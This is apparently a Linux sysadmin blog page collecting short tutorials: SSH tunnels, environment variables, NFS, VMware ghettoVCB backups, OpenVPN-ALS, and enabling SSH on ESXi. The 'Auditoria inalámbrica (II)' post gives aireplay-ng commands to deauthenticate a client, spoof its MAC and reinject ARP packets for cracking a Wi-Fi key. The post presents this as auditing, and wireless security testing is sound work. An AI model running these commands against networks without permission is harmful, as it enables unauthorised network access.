Consiste en lograr que usted sepa cómo funcionan las cosas para que de este modo no se vea limitado por las herramientas que utiliza.
Blog
-
Túnel SSH
¿Qué es un túnel SSH?
Un túnel SSH es una conexión SSH que transforma un puerto X en tu equipo, en el puerto Y de otra máquina, pasando por una tercera.¿Se entiende?
Es probable que no, así que me explicaré con detalles.Una conexión “tradicional”, es cuando quiero acceder a un cierto servicio en otra máquina, y me conecto directamente a ella. Tal como se muestra en la imagen a continuación.
Pero, ¿qué pasa cuando aún necesito conectarme a esa máquina, pero por alguna razón ya no puedo conectarme directamente?
En este caso, lo que se hace es usar un tunel SSH.
- Flechas Azules: Conexiones que si son posibles realizar.
- Flecha Verde: Túnel SSH. Conexión al otro equipo, pasando por el equipo que puede conectarse.
- Flecha Roja: Conexión en un puerto local, equivale a la conexión de la flecha roja de la imagen anterior.
¿Y como funciona?
$ ssh -L <puerto local>:<el otro equipo>:<puerto en el otro equipo> <equipo que puede conectarse> -l <usuario para el equipo que puede conectarse>
Por ejemplo, el servidor de Tareas (carretas.inf.utfsm.cl) del LabComp está restringido para ser accesado solo desde las IP’s del DI. Para conectarme a éste seria algo así como:
$ ssh -L 6666:carretas:22 ssh2.inf.utfsm.cl -l rcovarru
En el ejemplo, se podría haber omitido el -l rcovarru, ya que el usuario de mi equipo es exactamente igual.
Además, como ven, al nombre del servidor de tareas no se le agregó el dominio, eso es solo el equipo al que me estoy conectado (ssh2) también pertenece al mismo dominio.Ok, pero ese comando extraño, ¿Qué hace?
Transforma el puerto 6666 de mi equipo, en el puerto 22 (puerto de ssh) de carretas.Esto significa, que ahora me podré conectar “directamente” a carretas por el túnel, con:
$ ssh -p 6666 localhost -l usuario-en-carretas
Mientras que la conexión SSH esté viva, el túnel se mantendrá igual.
Esto, funciona para cualquier tipo de puerto, no solo para comunicarse por ssh. Si quieren conectar, por ejemplo, al servidor postgresql de carretas, el tunel debería ser:
$ ssh -L 6666:carretas:5432 ssh2.inf.utfsm.cl -l rcovarru
Y luego, la conexión de psql deberia ser algo así como:
$ psql -p 6666 -h localhost dbname pguser
Bonito, ¿verdad?
Entrada original de Renato Covarrubias-Romero
-
Auditoria inalámbrica (II)
A la hora de inyectar paquetes en el AP atacado debemos verificar su estado.Verificando el filtrado MAC.1. Antes de continuar debemos verificar si el punto de acceso realiza filtrado MAC en sus clientes. Usamos este comando:sudo aireplay-ng -1 0 -e <essid_objetivo> -a 55:55:55:55:55:55 -h MY:MA:CA:DD:RE:SS <interfaz>
Donde:
- -1 Le dice que NO intente desautentificar clientes.
- -e Es el nombre de la red objetivo.
- -a Es la MAC del AP objetivo.
- -h Es la MAC que tu quieras.
Si el resultado luce así:
03:22:32 Sending Authentication Request
03:22:32 Authentication successful
03:22:32 Sending Association Request
03:22:32 Association successfulSignifica que el filtrado esta apagado y podemos continuar con el tutorial, de otra forma salta a la sección Con Filtrado MAC.
Sin Filtrado MAC
1. Reinyección de paquetes.
sudo aireplay-ng -3 -b 55:55:55:55:55:55 -h MY:MA:CA:DD:RE:SS <interfaZ>
Ahora solo debemos ser pacientes hasta recibir un paquete ARP para poder usar una vez recibido el numero de paquetes recibidos se elevara muy rapido, en este punto como el filtrado esta desactivado podemos usar cualquier MAC. Podemos pasar a descifrar la clave.
Con Filtrado MAC
2. Obligamos a desautentificar al cliente que esta en el AP objetivo.
sudo aireplay-ng -0 5 -a 55:55:55:55:55:55 -c 00:11:22:33:44:55 <interface>
Donde:- -0 Indica el numero de intentos.
- -a El MAC del AP objetivo.
- -c La dirección MAC del cliente.
Para la Re-Inyección se procede de la misma forma solo que ahora nos haremos pasar por el cliente.
sudo aireplay-ng -3 -b 55:55:55:55:55:55 -h 00:11:22:33:44:55 <interfaz>
Como había mencionado… Ahora solo debemos ser pacientes hasta recibir un paquete ARP para poder usar una vez recibido el numero de paquetes recibidos se elevara muy rapido, en este punto como el filtrado esta desactivado podemos usar cualquier MAC. Podemos pasar a descifrar la clave.
Original El Tux AngelVerde
-
Auditoria Inalámbrica
Aunque parezca un tópico, con este texto no pretendo incitar al aprovechamiento de conexiones a internet ajenas sino aprender y encontrar sentido a lo que se hace.
Este tutorial se puede seguir utilizando una distribución preparada para ello como backtrack o bien instalando los paquetes necesarios en cualquier otra distribución.
Abre una ventana de terminal (o consola) y escribe lo siguiente:
airmon-ng
-
Variables de entorno en Linux
Al configurar programas, tales como Netbeans, Intellij Idea, Groovy, necesitamos especificar varias variables de entorno. Dichas variables las tenemos que controlar a través del fichero .bash.bashrc que puede estar situado en el directorio home del usuario o bien heredarse del mismo fichero en /etc.
Las variables normales que se suelen configurar son:
export JAVA_HOME=/usr/lib/jvm/java-6-sun
export JDK_HOME=/usr/lib/jvm/java-6-sun
export GROOVY_HOME=/home/miguel/groovy-1.7.0
PATH=$PATH:$JAVA_HOME/bin:$GROOVY_HOME/bin
export PATHjava -version
groovyc -version
-
Servidor NFS bajo Ubuntu
NFS es un sistema de archivos distribuido para un entorno de red de área local. Posibilita que distintos sistemas conectados a una misma red accedan a ficheros remotos como si se tratara de locales. A continuación se detalla la configuración del cliente y del servidor.
Configuración en el servidor
Los paquetes necesarios para el funcionamiento del servidor son portmap, nfs-kernel-server y nfs-common. Para la descarga de los mismos ejecutaremos los siguientes comandos:
root@mi_equipo:~# aptitude install portmap
root@mi_equipo:~# aptitude install nfs-kernel-server
root@mi_equipo:~# aptitude install nfs-common
Para la configuración de un servidor de NFS se necesitan editar tres ficheros: /etc/exports, /etc/hosts.deny y /etc/hosts.allow.
-
Ghetto Tech Preview – ghettoVCB-restore.sh – Restoring VM’s backed up from ghettoVCB to ESX(i) 3.5 and 4.0+
Table of Contents:
-
- Description
- Requirements
- Setup
- Usage
- Sample Execution
- Change Log
- Known Issues
Description:
This script performs a restore of virtual machines backed up using ghettoVCB. Tasks are performed directly within the service console of the ESX(i) server involved in the restore process. This is currently a Ghetto Tech Preview that includes basic restore functionality. Two main use cases are supported in this release:
1) Restore a VM that contains ALL VMDKs on one datastore
2) Restore a VM that has VMDKs located on multiple datastoresIn all cases, restored VMs will have VMDKs that reside on the SAME datastore chosen for the restore process. Please ensure that there is sufficient space on the target datastore before attempting a restore operation. In the near future, restoration of VMs backed up using the compression feature of ghettoVCB will be implemented.
-
-
Creating Virtual Machine Backups in VMware with GhettoVCB
Hi folks, like I mentioned before I’ll be showing you how to create backups using the GhettoVCB script from William Lam. First things first, please enable SSH access on your ESXi box. You can do this by following my steps in my previous blog post.
Next, you have to download the following software for use on your computer to help you get this all accomplished.
- Putty.exe (This is one of the more famous SSH programs out there used to connect to the ESXi server via SSH)
- Plink.exe (This is used to run command line commands in your SSH session with the ESX server, this is integral for scheduling scripts)
- WinSCP (This program is used to upload and download files between your ESXi server and your workstation)
After you have downloaded these programs, please install them on your workstation. Then you can go and download the ghettoVCB.sh script from the VMware communities web site where this script is hosted at.
After you have downloaded the script, do not edit it on a Windows computer otherwise you run the risk of introducing control characters into the script which will cause the script to fail when run on the ESXi server. Instead, just upload the script to your ESXi server using WinSCP. Please ensure that you change the transfer settings mode to text mode for the transfer.
(más…) -
Installing OpenVPN-ALS on Ubuntu
1) Use Synaptic or apt-get to install the following:
- ant (and its dependencies)
- sun-java6-bin
- sun-java6-jdk
2) Switch to root via «sudo -s».
3) Add the following to .bashrc in /root:
export JAVA_HOME=/usr/lib/jvm/java-6-sun export PATH=$PATH:$JAVA_HOME/bin java -version
Note: «java -version» is not actually required. It just gives you a nice indicator (when shifting to root) that the java binary can be «seen».
4) Type «exit» to leave root and switch back to root via «sudo -s». This reloads the root environment, including the changes you just made in #3.
5) Download the most recent version of [[1]] from SourceForge. (Note: Instead of clicking on the big green «Download» button, click on the «View all files» next to it. The idea here is you want to download the .tar.gz version, not the .zip.)
6) Move the file into /opt and untar the file. It will create its own working directory.
-
HOWTO: ESXi and SSH
By default this isn’t possible. But there’s a way to get this working, just do the following:
- Go to the ESXi console and press alt+F1
- Type: unsupported
- Enter the root password(No prompt, typing is blindly)
- At the prompt type “vi /etc/inetd.conf”
- Look for the line that starts with “#ssh” (you can search with pressing “/”)
- Remove the “#” (press the “x” if the cursor is on the character)
- Save “/etc/inetd.conf” by typing “:wq!”
- Restart the management service “/sbin/services.sh restart”
Done!